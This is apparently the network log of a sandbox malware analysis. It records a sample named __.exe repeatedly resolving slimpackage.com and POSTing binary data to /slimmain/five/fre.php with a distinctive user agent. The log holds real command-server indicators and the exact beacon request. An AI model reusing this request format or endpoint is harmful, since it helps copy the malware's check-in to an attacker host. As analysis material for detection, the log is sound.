                    Jan 14, 2022 09:24:29.239994049 CET8049748104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:29.240096092 CET4974880192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:29.242786884 CET4974880192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:29.365590096 CET8049748104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:29.365705967 CET4974880192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:29.488169909 CET8049748104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:29.497827053 CET8049748104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:29.497994900 CET8049748104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:29.498007059 CET4974880192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:29.498078108 CET4974880192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:29.620392084 CET8049748104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.220026016 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.343312979 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.345665932 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.358483076 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.481452942 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.482966900 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.605992079 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.613352060 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.613394022 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.613600969 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.613636017 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.736718893 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:32.716247082 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:32.840451956 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:32.840559959 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:32.843753099 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:32.967989922 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:32.968264103 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:33.092286110 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:33.104927063 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:33.105046988 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:33.105072021 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:33.105446100 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:33.229341984 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:34.115823984 CET4975180192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:34.240261078 CET8049751104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:34.240426064 CET4975180192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:34.253885984 CET4975180192.168.2.3104.223.93.105

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 09:24:21.022842884 CET5220653192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:21.041994095 CET53522068.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:22.849410057 CET5684453192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:22.866626978 CET53568448.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:24.288374901 CET5804553192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:24.491199017 CET53580458.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:25.847758055 CET5745953192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:25.866981983 CET53574598.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:27.266596079 CET5787553192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:27.286494970 CET53578758.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:29.095956087 CET5415453192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:29.115494967 CET53541548.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:31.097424030 CET5280653192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:31.216502905 CET53528068.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:32.593902111 CET5391053192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:32.714936018 CET53539108.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:34.094069958 CET6402153192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:34.113398075 CET53640218.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:35.468458891 CET6078453192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:35.592550993 CET53607848.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:36.883899927 CET5114353192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:36.901443005 CET53511438.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:38.276895046 CET5600953192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:38.296339035 CET53560098.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:40.867846012 CET5902653192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:40.886985064 CET53590268.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:43.616820097 CET6082353192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:43.636513948 CET53608238.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:46.233131886 CET5213053192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:46.252554893 CET53521308.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:48.821882010 CET5510253192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:49.035787106 CET53551028.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:50.665076017 CET5623653192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:50.684350014 CET53562368.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:53.359229088 CET5652753192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:53.376399994 CET53565278.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:54.650913954 CET4955953192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:54.670542955 CET53495598.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:56.439022064 CET5265053192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:56.458235979 CET53526508.8.8.8192.168.2.3
                    Jan 14, 2022 09:24:58.337716103 CET6329753192.168.2.38.8.8.8
                    Jan 14, 2022 09:24:58.357232094 CET53632978.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:00.348035097 CET5836153192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:00.367105961 CET53583618.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:02.026684046 CET5361553192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:02.045928001 CET53536158.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:04.672275066 CET5377753192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:04.691482067 CET53537778.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:07.196717978 CET5710653192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:07.216022968 CET53571068.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:08.780100107 CET6035253192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:08.799689054 CET53603528.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:10.754543066 CET5677353192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:10.773690939 CET53567738.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:12.293100119 CET5153953192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:12.312412024 CET53515398.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:13.731146097 CET5854053192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:13.749931097 CET53585408.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:17.017800093 CET6443253192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:17.037441015 CET53644328.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:20.107772112 CET4925053192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:20.125149012 CET53492508.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:24.253489017 CET6349053192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:24.272874117 CET53634908.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:27.264767885 CET6112053192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:27.282341003 CET53611208.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:32.635539055 CET5307953192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:32.654656887 CET53530798.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:35.461828947 CET5082453192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:35.481163979 CET53508248.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:37.798146009 CET5670653192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:37.817436934 CET53567068.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:40.044013977 CET5356953192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:40.063594103 CET53535698.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:42.948643923 CET6285553192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:42.968004942 CET53628558.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:44.363774061 CET5104653192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:44.381669998 CET53510468.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:45.760132074 CET6550153192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:45.777311087 CET53655018.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:47.734616995 CET5346553192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:47.753484011 CET53534658.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:49.878865957 CET4929053192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:49.898205996 CET53492908.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:53.184317112 CET5975453192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:53.204303026 CET53597548.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:55.338282108 CET4923453192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:55.357494116 CET53492348.8.8.8192.168.2.3
                    Jan 14, 2022 09:25:57.269567966 CET5872053192.168.2.38.8.8.8
                    Jan 14, 2022 09:25:57.287251949 CET53587208.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:01.674140930 CET5744753192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:01.693149090 CET53574478.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:03.396339893 CET6358353192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:03.415883064 CET53635838.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:04.867762089 CET6409953192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:04.887339115 CET53640998.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:06.348675013 CET6461053192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:06.367301941 CET53646108.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:07.753612041 CET5198953192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:07.772936106 CET53519898.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:09.111833096 CET5315253192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:09.131659985 CET53531528.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:10.694483995 CET6159053192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:10.713933945 CET53615908.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:12.039196014 CET5607753192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:12.058365107 CET53560778.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:13.663563013 CET5795153192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:13.683290958 CET53579518.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:15.080522060 CET5327653192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:15.100056887 CET53532768.8.8.8192.168.2.3
                    Jan 14, 2022 09:26:16.596752882 CET6013553192.168.2.38.8.8.8
                    Jan 14, 2022 09:26:16.615869999 CET53601358.8.8.8192.168.2.3

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jan 14, 2022 09:24:21.022842884 CET192.168.2.38.8.8.80x789fStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:22.849410057 CET192.168.2.38.8.8.80x22adStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:24.288374901 CET192.168.2.38.8.8.80xba3Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:25.847758055 CET192.168.2.38.8.8.80x2a61Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:27.266596079 CET192.168.2.38.8.8.80xbe4fStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:29.095956087 CET192.168.2.38.8.8.80x80eeStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:31.097424030 CET192.168.2.38.8.8.80x5133Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:32.593902111 CET192.168.2.38.8.8.80xa9f0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:34.094069958 CET192.168.2.38.8.8.80xb702Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:35.468458891 CET192.168.2.38.8.8.80xc19aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:36.883899927 CET192.168.2.38.8.8.80x7f02Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:38.276895046 CET192.168.2.38.8.8.80x2de0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:40.867846012 CET192.168.2.38.8.8.80xdba5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:43.616820097 CET192.168.2.38.8.8.80xcbecStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:46.233131886 CET192.168.2.38.8.8.80x18f2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:48.821882010 CET192.168.2.38.8.8.80xf39fStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:50.665076017 CET192.168.2.38.8.8.80xf7cStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:53.359229088 CET192.168.2.38.8.8.80xc6cbStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:54.650913954 CET192.168.2.38.8.8.80x7b32Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:56.439022064 CET192.168.2.38.8.8.80x1025Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:58.337716103 CET192.168.2.38.8.8.80x8a91Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:00.348035097 CET192.168.2.38.8.8.80xa699Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:02.026684046 CET192.168.2.38.8.8.80x64a4Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:04.672275066 CET192.168.2.38.8.8.80x1fdcStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:07.196717978 CET192.168.2.38.8.8.80x732bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:08.780100107 CET192.168.2.38.8.8.80x50d5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:10.754543066 CET192.168.2.38.8.8.80xb1d8Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:12.293100119 CET192.168.2.38.8.8.80xdffStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:13.731146097 CET192.168.2.38.8.8.80xe76eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:17.017800093 CET192.168.2.38.8.8.80xd636Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:20.107772112 CET192.168.2.38.8.8.80x3f01Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:24.253489017 CET192.168.2.38.8.8.80x2fa3Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:27.264767885 CET192.168.2.38.8.8.80xa16aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:32.635539055 CET192.168.2.38.8.8.80x1f06Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:35.461828947 CET192.168.2.38.8.8.80x3be0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:37.798146009 CET192.168.2.38.8.8.80x99c0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:40.044013977 CET192.168.2.38.8.8.80xeadStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:42.948643923 CET192.168.2.38.8.8.80xb5aeStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:44.363774061 CET192.168.2.38.8.8.80x248Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:45.760132074 CET192.168.2.38.8.8.80x1f60Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:47.734616995 CET192.168.2.38.8.8.80x912cStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:49.878865957 CET192.168.2.38.8.8.80x6f7dStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:53.184317112 CET192.168.2.38.8.8.80xc54Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:55.338282108 CET192.168.2.38.8.8.80xd91Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:57.269567966 CET192.168.2.38.8.8.80x5513Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:01.674140930 CET192.168.2.38.8.8.80x1d22Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:03.396339893 CET192.168.2.38.8.8.80x3670Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:04.867762089 CET192.168.2.38.8.8.80x4f3eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:06.348675013 CET192.168.2.38.8.8.80xef44Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:07.753612041 CET192.168.2.38.8.8.80xb245Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:09.111833096 CET192.168.2.38.8.8.80x2e09Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:10.694483995 CET192.168.2.38.8.8.80x77b5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:12.039196014 CET192.168.2.38.8.8.80x7a04Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:13.663563013 CET192.168.2.38.8.8.80x15d2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:15.080522060 CET192.168.2.38.8.8.80xdbbcStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:16.596752882 CET192.168.2.38.8.8.80x83bfStandard query (0)slimpackage.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jan 14, 2022 09:24:21.041994095 CET8.8.8.8192.168.2.30x789fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:22.866626978 CET8.8.8.8192.168.2.30x22adNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:24.491199017 CET8.8.8.8192.168.2.30xba3No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:25.866981983 CET8.8.8.8192.168.2.30x2a61No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:27.286494970 CET8.8.8.8192.168.2.30xbe4fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:29.115494967 CET8.8.8.8192.168.2.30x80eeNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:31.216502905 CET8.8.8.8192.168.2.30x5133No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:32.714936018 CET8.8.8.8192.168.2.30xa9f0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:34.113398075 CET8.8.8.8192.168.2.30xb702No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:35.592550993 CET8.8.8.8192.168.2.30xc19aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:36.901443005 CET8.8.8.8192.168.2.30x7f02No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:38.296339035 CET8.8.8.8192.168.2.30x2de0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:40.886985064 CET8.8.8.8192.168.2.30xdba5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:43.636513948 CET8.8.8.8192.168.2.30xcbecNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:46.252554893 CET8.8.8.8192.168.2.30x18f2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:49.035787106 CET8.8.8.8192.168.2.30xf39fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:50.684350014 CET8.8.8.8192.168.2.30xf7cNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:53.376399994 CET8.8.8.8192.168.2.30xc6cbNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:54.670542955 CET8.8.8.8192.168.2.30x7b32No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:56.458235979 CET8.8.8.8192.168.2.30x1025No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:24:58.357232094 CET8.8.8.8192.168.2.30x8a91No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:00.367105961 CET8.8.8.8192.168.2.30xa699No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:02.045928001 CET8.8.8.8192.168.2.30x64a4No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:04.691482067 CET8.8.8.8192.168.2.30x1fdcNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:07.216022968 CET8.8.8.8192.168.2.30x732bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:08.799689054 CET8.8.8.8192.168.2.30x50d5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:10.773690939 CET8.8.8.8192.168.2.30xb1d8No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:12.312412024 CET8.8.8.8192.168.2.30xdffNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:13.749931097 CET8.8.8.8192.168.2.30xe76eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:17.037441015 CET8.8.8.8192.168.2.30xd636No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:20.125149012 CET8.8.8.8192.168.2.30x3f01No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:24.272874117 CET8.8.8.8192.168.2.30x2fa3No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:27.282341003 CET8.8.8.8192.168.2.30xa16aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:32.654656887 CET8.8.8.8192.168.2.30x1f06No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:35.481163979 CET8.8.8.8192.168.2.30x3be0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:37.817436934 CET8.8.8.8192.168.2.30x99c0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:40.063594103 CET8.8.8.8192.168.2.30xeadNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:42.968004942 CET8.8.8.8192.168.2.30xb5aeNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:44.381669998 CET8.8.8.8192.168.2.30x248No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:45.777311087 CET8.8.8.8192.168.2.30x1f60No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:47.753484011 CET8.8.8.8192.168.2.30x912cNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:49.898205996 CET8.8.8.8192.168.2.30x6f7dNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:53.204303026 CET8.8.8.8192.168.2.30xc54No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:55.357494116 CET8.8.8.8192.168.2.30xd91No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:25:57.287251949 CET8.8.8.8192.168.2.30x5513No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:01.693149090 CET8.8.8.8192.168.2.30x1d22No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:03.415883064 CET8.8.8.8192.168.2.30x3670No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:04.887339115 CET8.8.8.8192.168.2.30x4f3eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:06.367301941 CET8.8.8.8192.168.2.30xef44No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:07.772936106 CET8.8.8.8192.168.2.30xb245No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:09.131659985 CET8.8.8.8192.168.2.30x2e09No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:10.713933945 CET8.8.8.8192.168.2.30x77b5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:12.058365107 CET8.8.8.8192.168.2.30x7a04No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:13.683290958 CET8.8.8.8192.168.2.30x15d2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:15.100056887 CET8.8.8.8192.168.2.30xdbbcNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 09:26:16.615869999 CET8.8.8.8192.168.2.30x83bfNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • slimpackage.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.349743104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:21.210021973 CET1028OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 190
                    Connection: close
                    Jan 14, 2022 09:24:21.478250980 CET1029INHTTP/1.1 404 Not Found
                    Date: Fri, 14 Jan 2022 08:24:20 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


